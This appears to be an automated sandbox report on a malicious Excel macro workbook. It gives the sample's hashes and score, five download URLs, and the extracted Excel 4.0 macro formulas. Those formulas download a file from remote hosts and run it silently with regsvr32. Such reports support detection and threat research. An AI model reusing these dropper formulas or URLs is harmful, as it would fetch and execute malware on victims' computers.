Overview

overview

10

Static

static

10

ad7828bb3c...9.xlsm

windows7-x64

10

ad7828bb3c...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9

  • Size

    91KB

  • Sample

    241120-raw8gssldm

  • MD5

    2c92174799a0211bee713736f553f677

  • SHA1

    d7be5aa1357bdd94badfdee29ec70cb33ae001cd

  • SHA256

    ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9

  • SHA512

    49c083e18e034627421763d4bc9bb4fa731841023439c3cf92df20aa35e2405d61edb175fd5f5f839ae145124c3502887fe070e38f9cfc1d7095c576f0d958f0

  • SSDEEP

    1536:syx1gX2hnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0Hi:syDm2hyVEoBo6hKb4llGsQjbxoi

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://ajmotorsshop.com/grad-ooze/O/

https://msubrahm.com/wp-admin/5SjBp9WHfGbtgY/

http://moveconnects.com/item-immo/5NAtMXXCkzQ5NrX3z/9moeTie4vHJ/

http://beta2.emeritus.org/wp-content.previous/WS0O/

https://karmapedia.com/wp-includes/edvf/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://ajmotorsshop.com/grad-ooze/O/","..\su1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://msubrahm.com/wp-admin/5SjBp9WHfGbtgY/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/item-immo/5NAtMXXCkzQ5NrX3z/9moeTie4vHJ/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://beta2.emeritus.org/wp-content.previous/WS0O/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://karmapedia.com/wp-includes/edvf/","..\su1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\su1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://ajmotorsshop.com/grad-ooze/O/
xlm40.dropper

https://msubrahm.com/wp-admin/5SjBp9WHfGbtgY/
xlm40.dropper

http://moveconnects.com/item-immo/5NAtMXXCkzQ5NrX3z/9moeTie4vHJ/
xlm40.dropper

http://beta2.emeritus.org/wp-content.previous/WS0O/
xlm40.dropper

https://karmapedia.com/wp-includes/edvf/

Targets

    • Target

      ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9

    • Size

      91KB

    • MD5

      2c92174799a0211bee713736f553f677

    • SHA1

      d7be5aa1357bdd94badfdee29ec70cb33ae001cd

    • SHA256

      ad7828bb3c8ae94f263e009435dd72196f8f650da978eb41b920c6cfb44fd3c9

    • SHA512

      49c083e18e034627421763d4bc9bb4fa731841023439c3cf92df20aa35e2405d61edb175fd5f5f839ae145124c3502887fe070e38f9cfc1d7095c576f0d958f0

    • SSDEEP

      1536:syx1gX2hnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0Hi:syDm2hyVEoBo6hKb4llGsQjbxoi

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks